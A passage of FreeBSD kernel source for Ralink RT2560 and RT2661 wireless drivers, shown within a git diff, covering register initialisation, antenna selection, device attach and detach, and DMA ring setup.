N(rt2560_def_bbp); i++) { rt2560_bbp_write(sc, rt2560_def_bbp[i].reg, rt2560_def_bbp[i].val); } /* initialize BBP registers to values stored in EEPROM */ for (i = 0; i < 16; i++) { if (sc->bbp_prom[i].reg == 0 && sc->bbp_prom[i].val == 0) break; rt2560_bbp_write(sc, sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } rt2560_bbp_write(sc, 17, 0x48); /* XXX restore bbp17 */ return 0; #undef N } static void rt2560_set_txantenna(struct rt2560_softc *sc, int antenna) { uint32_t tmp; uint8_t tx; tx = rt2560_bbp_read(sc, RT2560_BBP_TX) & ~RT2560_BBP_ANTMASK; if (antenna == 1) tx |= RT2560_BBP_ANTA; else if (antenna == 2) tx |= RT2560_BBP_ANTB; else tx |= RT2560_BBP_DIVERSITY; /* need to force I/Q flip for RF 2525e, 2526 and 5222 */ if (sc->rf_rev == RT2560_RF_2525E || sc->rf_rev == RT2560_RF_2526 || sc->rf_rev == RT2560_RF_5222) tx |= RT2560_BBP_FLIPIQ; rt2560_bbp_write(sc, RT2560_BBP_TX, tx); /* update values for CCK and OFDM in BBPCSR1 */ tmp = RAL_READ(sc, RT2560_BBPCSR1) & ~0x00070007; tmp |= (tx & 0x7) << 16 | (tx & 0x7); RAL_WRITE(sc, RT2560_BBPCSR1, tmp); } static void rt2560_set_rxantenna(struct rt2560_softc *sc, int antenna) { uint8_t rx; rx = rt2560_bbp_read(sc, RT2560_BBP_RX) & ~RT2560_BBP_ANTMASK; if (antenna == 1) rx |= RT2560_BBP_ANTA; else if (antenna == 2) rx |= RT2560_BBP_ANTB; else rx |= RT2560_BBP_DIVERSITY; /* need to force no I/Q flip for RF 2525e and 2526 */ if (sc->rf_rev == RT2560_RF_2525E || sc->rf_rev == RT2560_RF_2526) rx &= ~RT2560_BBP_FLIPIQ; rt2560_bbp_write(sc, RT2560_BBP_RX, rx); } static void rt2560_init_locked(struct rt2560_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; int i; RAL_LOCK_ASSERT(sc); rt2560_stop_locked(sc); /* setup tx rings */ tmp = RT2560_PRIO_RING_COUNT << 24 | RT2560_ATIM_RING_COUNT << 16 | RT2560_TX_RING_COUNT << 8 | RT2560_TX_DESC_SIZE; /* rings must be initialized in this exact order */ RAL_WRITE(sc, RT2560_TXCSR2, tmp); RAL_WRITE(sc, RT2560_TXCSR3, sc->txq.physaddr); RAL_WRITE(sc, RT2560_TXCSR5, sc->prioq.physaddr); RAL_WRITE(sc, RT2560_TXCSR4, sc->atimq.physaddr); RAL_WRITE(sc, RT2560_TXCSR6, sc->bcnq.physaddr); /* setup rx ring */ tmp = RT2560_RX_RING_COUNT << 8 | RT2560_RX_DESC_SIZE; RAL_WRITE(sc, RT2560_RXCSR1, tmp); RAL_WRITE(sc, RT2560_RXCSR2, sc->rxq.physaddr); /* initialize MAC registers to default values */ for (i = 0; i < N(rt2560_def_mac); i++) RAL_WRITE(sc, rt2560_def_mac[i].reg, rt2560_def_mac[i].val); rt2560_set_macaddr(sc, IF_LLADDR(ifp)); /* set basic rate set (will be updated later) */ RAL_WRITE(sc, RT2560_ARSP_PLCP_1, 0x153); rt2560_update_slot(ifp); rt2560_update_plcp(sc); rt2560_update_led(sc, 0, 0); RAL_WRITE(sc, RT2560_CSR1, RT2560_RESET_ASIC); RAL_WRITE(sc, RT2560_CSR1, RT2560_HOST_READY); if (rt2560_bbp_init(sc) != 0) { rt2560_stop_locked(sc); return; } rt2560_set_txantenna(sc, sc->tx_ant); rt2560_set_rxantenna(sc, sc->rx_ant); /* set default BSS channel */ rt2560_set_chan(sc, ic->ic_curchan); /* kick Rx */ tmp = RT2560_DROP_PHY_ERROR | RT2560_DROP_CRC_ERROR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2560_DROP_CTL | RT2560_DROP_VERSION_ERROR; if (ic->ic_opmode != IEEE80211_M_HOSTAP && ic->ic_opmode != IEEE80211_M_MBSS) tmp |= RT2560_DROP_TODS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2560_DROP_NOT_TO_ME; } RAL_WRITE(sc, RT2560_RXCSR0, tmp); /* clear old FCS and Rx FIFO errors */ RAL_READ(sc, RT2560_CNT0); RAL_READ(sc, RT2560_CNT4); /* clear any pending interrupts */ RAL_WRITE(sc, RT2560_CSR7, 0xffffffff); /* enable interrupts */ RAL_WRITE(sc, RT2560_CSR8, RT2560_INTR_MASK); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->watchdog_ch, hz, rt2560_watchdog, sc); #undef N } static void rt2560_init(void *priv) { struct rt2560_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); rt2560_init_locked(sc); RAL_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void rt2560_stop_locked(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; volatile int *flags = &sc->sc_flags; RAL_LOCK_ASSERT(sc); while (*flags & RT2560_F_INPUT_RUNNING) msleep(sc, &sc->sc_mtx, 0, "ralrunning", hz/10); callout_stop(&sc->watchdog_ch); sc->sc_tx_timer = 0; if (ifp->if_drv_flags & IFF_DRV_RUNNING) { ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* abort Tx */ RAL_WRITE(sc, RT2560_TXCSR0, RT2560_ABORT_TX); /* disable Rx */ RAL_WRITE(sc, RT2560_RXCSR0, RT2560_DISABLE_RX); /* reset ASIC (imply reset BBP) */ RAL_WRITE(sc, RT2560_CSR1, RT2560_RESET_ASIC); RAL_WRITE(sc, RT2560_CSR1, 0); /* disable interrupts */ RAL_WRITE(sc, RT2560_CSR8, 0xffffffff); /* reset Tx and Rx rings */ rt2560_reset_tx_ring(sc, &sc->txq); rt2560_reset_tx_ring(sc, &sc->atimq); rt2560_reset_tx_ring(sc, &sc->prioq); rt2560_reset_tx_ring(sc, &sc->bcnq); rt2560_reset_rx_ring(sc, &sc->rxq); } sc->sc_flags &= ~(RT2560_F_PRIO_OACTIVE | RT2560_F_DATA_OACTIVE); } void rt2560_stop(void *arg) { struct rt2560_softc *sc = arg; RAL_LOCK(sc); rt2560_stop_locked(sc); RAL_UNLOCK(sc); } static int rt2560_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; RAL_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (sc->prioq.queued >= RT2560_PRIO_RING_COUNT) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; sc->sc_flags |= RT2560_F_PRIO_OACTIVE; RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENOBUFS; /* XXX */ } ifp->if_opackets++; if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ if (rt2560_tx_mgt(sc, m, ni) != 0) goto bad; } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ if (rt2560_tx_raw(sc, m, ni, params)) goto bad; } sc->sc_tx_timer = 5; RAL_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; ieee80211_free_node(ni); RAL_UNLOCK(sc); return EIO; /* XXX */ } diff --git a/sys/dev/ral/rt2661.c b/sys/dev/ral/rt2661.c index 4c1dc565a2ae..7b621d7e7ae4 100644 --- a/sys/dev/ral/rt2661.c +++ b/sys/dev/ral/rt2661.c @@ -1,2845 +1,2845 @@ /* $FreeBSD$ */ /*- * Copyright (c) 2006 * Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2561, RT2561S and RT2661 chipset driver * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define RAL_DEBUG #ifdef RAL_DEBUG #define DPRINTF(sc, fmt, ...) do { \ if (sc->sc_debug > 0) \ printf(fmt, __VA_ARGS__); \ } while (0) #define DPRINTFN(sc, n, fmt, ...) do { \ if (sc->sc_debug >= (n)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, fmt, ...) #define DPRINTFN(sc, n, fmt, ...) #endif static struct ieee80211vap *rt2661_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void rt2661_vap_delete(struct ieee80211vap *); static void rt2661_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int rt2661_alloc_tx_ring(struct rt2661_softc *, struct rt2661_tx_ring *, int); static void rt2661_reset_tx_ring(struct rt2661_softc *, struct rt2661_tx_ring *); static void rt2661_free_tx_ring(struct rt2661_softc *, struct rt2661_tx_ring *); static int rt2661_alloc_rx_ring(struct rt2661_softc *, struct rt2661_rx_ring *, int); static void rt2661_reset_rx_ring(struct rt2661_softc *, struct rt2661_rx_ring *); static void rt2661_free_rx_ring(struct rt2661_softc *, struct rt2661_rx_ring *); static int rt2661_newstate(struct ieee80211vap *, enum ieee80211_state, int); static uint16_t rt2661_eeprom_read(struct rt2661_softc *, uint8_t); static void rt2661_rx_intr(struct rt2661_softc *); static void rt2661_tx_intr(struct rt2661_softc *); static void rt2661_tx_dma_intr(struct rt2661_softc *, struct rt2661_tx_ring *); static void rt2661_mcu_beacon_expire(struct rt2661_softc *); static void rt2661_mcu_wakeup(struct rt2661_softc *); static void rt2661_mcu_cmd_intr(struct rt2661_softc *); static void rt2661_scan_start(struct ieee80211com *); static void rt2661_scan_end(struct ieee80211com *); static void rt2661_set_channel(struct ieee80211com *); static void rt2661_setup_tx_desc(struct rt2661_softc *, struct rt2661_tx_desc *, uint32_t, uint16_t, int, int, const bus_dma_segment_t *, int, int); static int rt2661_tx_data(struct rt2661_softc *, struct mbuf *, struct ieee80211_node *, int); static int rt2661_tx_mgt(struct rt2661_softc *, struct mbuf *, struct ieee80211_node *); static void rt2661_start_locked(struct ifnet *); static void rt2661_start(struct ifnet *); static int rt2661_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void rt2661_watchdog(void *); static int rt2661_ioctl(struct ifnet *, u_long, caddr_t); static void rt2661_bbp_write(struct rt2661_softc *, uint8_t, uint8_t); static uint8_t rt2661_bbp_read(struct rt2661_softc *, uint8_t); static void rt2661_rf_write(struct rt2661_softc *, uint8_t, uint32_t); static int rt2661_tx_cmd(struct rt2661_softc *, uint8_t, uint16_t); static void rt2661_select_antenna(struct rt2661_softc *); static void rt2661_enable_mrr(struct rt2661_softc *); static void rt2661_set_txpreamble(struct rt2661_softc *); static void rt2661_set_basicrates(struct rt2661_softc *, const struct ieee80211_rateset *); static void rt2661_select_band(struct rt2661_softc *, struct ieee80211_channel *); static void rt2661_set_chan(struct rt2661_softc *, struct ieee80211_channel *); static void rt2661_set_bssid(struct rt2661_softc *, const uint8_t *); static void rt2661_set_macaddr(struct rt2661_softc *, const uint8_t *); static void rt2661_update_promisc(struct ifnet *); static int rt2661_wme_update(struct ieee80211com *) __unused; static void rt2661_update_slot(struct ifnet *); static const char *rt2661_get_rf(int); static void rt2661_read_eeprom(struct rt2661_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static int rt2661_bbp_init(struct rt2661_softc *); static void rt2661_init_locked(struct rt2661_softc *); static void rt2661_init(void *); static void rt2661_stop_locked(struct rt2661_softc *); static void rt2661_stop(void *); static int rt2661_load_microcode(struct rt2661_softc *); #ifdef notyet static void rt2661_rx_tune(struct rt2661_softc *); static void rt2661_radar_start(struct rt2661_softc *); static int rt2661_radar_stop(struct rt2661_softc *); #endif static int rt2661_prepare_beacon(struct rt2661_softc *, struct ieee80211vap *); static void rt2661_enable_tsf_sync(struct rt2661_softc *); static void rt2661_enable_tsf(struct rt2661_softc *); static int rt2661_get_rssi(struct rt2661_softc *, uint8_t); static const struct { uint32_t reg; uint32_t val; } rt2661_def_mac[] = { RT2661_DEF_MAC }; static const struct { uint8_t reg; uint8_t val; } rt2661_def_bbp[] = { RT2661_DEF_BBP }; static const struct rfprog { uint8_t chan; uint32_t r1, r2, r3, r4; } rt2661_rf5225_1[] = { RT2661_RF5225_1 }, rt2661_rf5225_2[] = { RT2661_RF5225_2 }; int rt2661_attach(device_t dev, int id) { struct rt2661_softc *sc = device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; uint32_t val; int error, ac, ntries; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_id = id; sc->sc_dev = dev; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); return ENOMEM; } ic = ifp->if_l2com; mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); callout_init_mtx(&sc->watchdog_ch, &sc->sc_mtx, 0); /* wait for NIC to initialize */ for (ntries = 0; ntries < 1000; ntries++) { if ((val = RAL_READ(sc, RT2661_MAC_CSR0)) != 0) break; DELAY(1000); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for NIC to initialize\n"); error = EIO; goto fail1; } /* retrieve RF rev. no and various other things from EEPROM */ rt2661_read_eeprom(sc, macaddr); device_printf(dev, "MAC/BBP RT%X, RF %s\n", val, rt2661_get_rf(sc->rf_rev)); /* * Allocate Tx and Rx rings. */ for (ac = 0; ac < 4; ac++) { error = rt2661_alloc_tx_ring(sc, &sc->txq[ac], RT2661_TX_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx ring %d\n", ac); goto fail2; } } error = rt2661_alloc_tx_ring(sc, &sc->mgtq, RT2661_MGT_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Mgt ring\n"); goto fail2; } error = rt2661_alloc_rx_ring(sc, &sc->rxq, RT2661_RX_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Rx ring\n"); goto fail3; } ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rt2661_init; ifp->if_ioctl = rt2661_ioctl; ifp->if_start = rt2661_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_IBSS /* ibss, nee adhoc, mode */ | IEEE80211_C_HOSTAP /* hostap mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ | IEEE80211_C_WDS /* 4-address traffic works */ | IEEE80211_C_MBSS /* mesh point link mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ #ifdef notyet | IEEE80211_C_TXFRAG /* handle tx frags */ | IEEE80211_C_WME /* 802.11e */ #endif ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2661_RF_5225 || sc->rf_rev == RT2661_RF_5325) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); #if 0 ic->ic_wme.wme_update = rt2661_wme_update; #endif ic->ic_scan_start = rt2661_scan_start; ic->ic_scan_end = rt2661_scan_end; ic->ic_set_channel = rt2661_set_channel; ic->ic_updateslot = rt2661_update_slot; ic->ic_update_promisc = rt2661_update_promisc; ic->ic_raw_xmit = rt2661_raw_xmit; ic->ic_vap_create = rt2661_vap_create; ic->ic_vap_delete = rt2661_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RT2661_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RT2661_RX_RADIOTAP_PRESENT); #ifdef RAL_DEBUG SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "debug msgs"); #endif if (bootverbose) ieee80211_announce(ic); return 0; fail3: rt2661_free_tx_ring(sc, &sc->mgtq); fail2: while (--ac >= 0) rt2661_free_tx_ring(sc, &sc->txq[ac]); fail1: mtx_destroy(&sc->sc_mtx); if_free(ifp); return error; } int rt2661_detach(void *xsc) { struct rt2661_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); rt2661_stop_locked(sc); RAL_UNLOCK(sc); ieee80211_ifdetach(ic); rt2661_free_tx_ring(sc, &sc->txq[0]); rt2661_free_tx_ring(sc, &sc->txq[1]); rt2661_free_tx_ring(sc, &sc->txq[2]); rt2661_free_tx_ring(sc, &sc->txq[3]); rt2661_free_tx_ring(sc, &sc->mgtq); rt2661_free_rx_ring(sc, &sc->rxq); if_free(ifp); mtx_destroy(&sc->sc_mtx); return 0; } static struct ieee80211vap * rt2661_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct rt2661_vap *rvp; struct ieee80211vap *vap; switch (opmode) { case IEEE80211_M_STA: case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: case IEEE80211_M_MONITOR: case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: /* XXXRP: TBD */ if (!TAILQ_EMPTY(&ic->ic_vaps)) { if_printf(ifp, "only 1 vap supported\n"); return NULL; } if (opmode == IEEE80211_M_STA) flags |= IEEE80211_CLONE_NOBEACONS; break; case IEEE80211_M_WDS: if (TAILQ_EMPTY(&ic->ic_vaps) || ic->ic_opmode != IEEE80211_M_HOSTAP) { if_printf(ifp, "wds only supported in ap mode\n"); return NULL; } /* * Silently remove any request for a unique * bssid; WDS vap's always share the local * mac address. */ flags &= ~IEEE80211_CLONE_BSSID; break; default: if_printf(ifp, "unknown opmode %d\n", opmode); return NULL; } rvp = (struct rt2661_vap *) malloc(sizeof(struct rt2661_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return NULL; vap = &rvp->ral_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override state transition machine */ rvp->ral_newstate = vap->iv_newstate; vap->iv_newstate = rt2661_newstate; #if 0 vap->iv_update_beacon = rt2661_beacon_update; #endif ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); if (TAILQ_FIRST(&ic->ic_vaps) == vap) ic->ic_opmode = opmode; return vap; } static void rt2661_vap_delete(struct ieee80211vap *vap) { struct rt2661_vap *rvp = RT2661_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } void rt2661_shutdown(void *xsc) { struct rt2661_softc *sc = xsc; rt2661_stop(sc); } void rt2661_suspend(void *xsc) { struct rt2661_softc *sc = xsc; rt2661_stop(sc); } void rt2661_resume(void *xsc) { struct rt2661_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) rt2661_init(sc); } static void rt2661_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int rt2661_alloc_tx_ring(struct rt2661_softc *sc, struct rt2661_tx_ring *ring, int count) { int i, error; ring->count = count; ring->queued = 0; ring->cur = ring->next = ring->stat = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * RT2661_TX_DESC_SIZE, 1, count * RT2661_TX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * RT2661_TX_DESC_SIZE, rt2661_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct rt2661_tx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, RT2661_MAX_SCATTER, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { error = bus_dmamap_create(ring->data_dmat, 0, &ring->data[i].map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } } return 0; fail: rt2661_free_tx_ring(sc, ring); return error; } static void rt2661_reset_tx_ring(struct rt2661_softc *sc, struct rt2661_tx_ring *ring) { struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; int i; for (i = 0; i < ring->count; i++) { desc = &ring->desc[i]; data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } desc->flags = 0; } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->queued = 0; ring->cur = ring->next = ring->stat = 0; } static void rt2661_free_tx_ring(struct rt2661_softc *sc, struct rt2661_tx_ring *ring) { struct rt2661_tx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->ni != NULL) ieee80211_free_node(data->ni); if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int rt2661_alloc_rx_ring(struct rt2661_softc *sc, struct rt2661_rx_ring *ring, int count) { struct rt2661_rx_desc *desc; struct rt2661_rx_data *data; bus_addr_t physaddr; int i, error; ring->count = count; ring->cur = ring->next = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * RT2661_RX_DESC_SIZE, 1, count * RT2661_RX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * RT2661_RX_DESC_SIZE, rt2661_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct rt2661_rx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } /* * Pre-allocate Rx buffers and populate Rx ring. */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { desc = &sc->rxq.desc[i]; data = &sc->rxq.data[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2661_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load rx buf DMA map"); goto fail; } desc->flags = htole32(RT2661_RX_BUSY); desc->physaddr = htole32(physaddr); } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); return 0; fail: rt2661_free_rx_ring(sc, ring); return error; } static void rt2661_reset_rx_ring(struct rt2661_softc *sc, struct rt2661_rx_ring *ring) { int i; for (i = 0; i < ring->count; i++) ring->desc[i].flags = htole32(RT2661_RX_BUSY); bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->cur = ring->next = 0; } static void rt2661_free_rx_ring(struct rt2661_softc *sc, struct rt2661_rx_ring *ring) { struct rt2661_rx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int rt2661_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rt2661_vap *rvp = RT2661_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct rt2661_softc *sc = ic->ic_ifp->if_softc; int error; if (nstate == IEEE80211_S_INIT && vap->iv_state == IEEE80211_S_RUN) { uint32_t tmp; /* abort TSF synchronization */ tmp = RAL_READ(sc, RT2661_TXRX_CSR9); RAL_WRITE(sc, RT2661_TXRX_CSR9, tmp & ~0x00ffffff); } error = rvp->ral_newstate(vap, nstate, arg); if (error == 0 && nstate == IEEE80211_S_RUN) { struct ieee80211_node *ni = vap->iv_bss; if (vap->iv_opmode != IEEE80211_M_MONITOR) { rt2661_enable_mrr(sc); rt2661_set_txpreamble(sc); rt2661_set_basicrates(sc, &ni->ni_rates); rt2661_set_bssid(sc, ni->ni_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) { error = rt2661_prepare_beacon(sc, vap); if (error != 0) return error; } if (vap->iv_opmode != IEEE80211_M_MONITOR) rt2661_enable_tsf_sync(sc); else rt2661_enable_tsf(sc); } return error; } /* * Read 16 bits at address 'addr' from the serial EEPROM (either 93C46 or * 93C66). */ static uint16_t rt2661_eeprom_read(struct 